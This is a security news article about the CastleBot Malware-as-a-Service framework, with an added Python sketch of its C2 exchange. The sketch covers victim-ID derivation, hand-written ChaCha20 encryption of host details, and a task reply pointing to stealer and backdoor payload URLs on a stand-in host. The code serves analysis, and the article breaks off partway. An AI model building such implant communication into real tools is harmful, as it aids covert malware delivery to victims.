CastleBot MaaS Released Diverse Payloads in Coordinated Mass Ransomware Attacks
IBM X-Force has uncovered CastleBot, a nascent malware framework operating as a Malware-as-a-Service (MaaS) platform, enabling cybercriminals to deploy a spectrum of payloads ranging from infostealers to sophisticated backdoors implicated in ransomware operations.
First detected in early 2025 with heightened activity since May, CastleBot facilitates the delivery of threats like NetSupport and WarmCookie, which have historical ties to ransomware attacks.
The framework’s flexibility lets operators filter victims, manage infections, and single out high-value assets: each implant gathers host enumeration data such as the username, NetBIOS name and system architecture, together with a unique victim ID derived from the volume serial number via a linear congruential generator.

The malware’s core component communicates with its command-and-control (C2) servers over HTTP using ChaCha-encrypted serialized containers. It requests tasks from the server, and a single task response can carry several payloads at once, so one infection may stage multiple tools in the same campaign, which complicates detection logic that expects a single dropped file per intrusion.
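As an added, illustrative example (this is not CastleBot’s code, and the report does not publish its container format), the Python below sketches the check-in described above: a victim ID derived from the volume serial with a linear congruential generator (the constants are assumed; glibc’s rand() constants stand in), host fields packed into a small serialized container, ChaCha20 (RFC 8439, implemented here directly from the specification) encrypting both the request and the reply, and a task response that carries more than one payload. The magic values, field layout, key, nonces, host data and URLs are all constructed for the example; the HTTP transport is omitted.

```python
import struct

MASK32 = 0xFFFFFFFF


# --- ChaCha20 keystream (RFC 8439), written from the spec for this example ---
def _rotl32(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK32


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block for a 32-byte key, 32-bit counter, 12-byte nonce."""
    state = list(struct.unpack("<4I", b"expand 32-byte k"))
    state += struct.unpack("<8I", key)
    state.append(counter & MASK32)
    state += struct.unpack("<3I", nonce)
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 double rounds (column + diagonal)
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK32 for x, y in zip(w, state)))


def chacha20_xor(key, nonce, data, counter=1):
    """Encrypt or decrypt (same operation). A nonce must never repeat under one key."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], ks))
    return bytes(out)


# --- Victim ID: LCG seeded with the volume serial (constants are an assumption) ---
LCG_A, LCG_C = 1103515245, 12345  # glibc rand() constants, used as a stand-in


def lcg_step(x):
    return (LCG_A * x + LCG_C) & MASK32


def victim_id(volume_serial, rounds=4):
    x = volume_serial & MASK32
    for _ in range(rounds):
        x = lcg_step(x)
    return x


# --- Hypothetical check-in container and task reply (invented layout) ---
def _lv(b):  # 16-bit little-endian length prefix + bytes
    return struct.pack("<H", len(b)) + b


def build_checkin(username, netbios, arch, volume_serial):
    return (b"CHK1" + struct.pack("<I", victim_id(volume_serial))
            + _lv(username.encode()) + _lv(netbios.encode()) + _lv(arch.encode()))


def parse_checkin(blob):
    if blob[:4] != b"CHK1":
        raise ValueError("bad check-in magic")
    vid = struct.unpack_from("<I", blob, 4)[0]
    fields, off = [], 8
    for _ in range(3):
        ln = struct.unpack_from("<H", blob, off)[0]; off += 2
        fields.append(blob[off:off + ln].decode()); off += ln
    return {"victim_id": vid, "username": fields[0], "netbios": fields[1], "arch": fields[2]}


def build_tasks(payloads):  # payloads: list of (kind, url); several per reply
    body = b"TSK1" + struct.pack("<H", len(payloads))
    for kind, url in payloads:
        body += struct.pack("<B", kind) + _lv(url.encode())
    return body


def parse_tasks(blob):
    if blob[:4] != b"TSK1":
        raise ValueError("bad task magic")
    count = struct.unpack_from("<H", blob, 4)[0]
    tasks, off = [], 6
    for _ in range(count):
        kind, ln = struct.unpack_from("<BH", blob, off); off += 3
        tasks.append((kind, blob[off:off + ln].decode())); off += ln
    return tasks


KEY = bytes(range(32))  # constructed sample key; a real implant embeds its own


def exchange():
    """Client check-in, server task reply, both encrypted. Returns (host, tasks)."""
    req_nonce = b"\x00" * 8 + b"\x00\x00\x00\x01"          # constructed sample host data below
    req = chacha20_xor(KEY, req_nonce, build_checkin("alice", "WS-0042", "x64", 0x1C2F9B17))
    host = parse_checkin(chacha20_xor(KEY, req_nonce, req))  # server decrypts and filters
    payloads = [(1, "http://c2.example/stealer.bin"),
                (2, "http://c2.example/backdoor.bin")] if host["arch"] == "x64" else []
    resp_nonce = b"\x00" * 8 + b"\x00\x00\x00\x02"
    resp = chacha20_xor(KEY, resp_nonce, build_tasks(payloads))
    return host, parse_tasks(chacha20_xor(KEY, resp_nonce, resp))  # client side
```

The server-side branch on `host["arch"]` is where an operator’s victim filtering would sit; an analyst reproducing the ID derivation from a recovered sample can correlate the same victim across C2 traffic captures, and the length-prefixed layout is the kind of structure to look for when carving decrypted containers.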
Malware-as-a-Service Landscape
CastleBot’s infection chain begins with trojanized software installers distributed through ...
Copyright of this story belongs solely to gbhackers.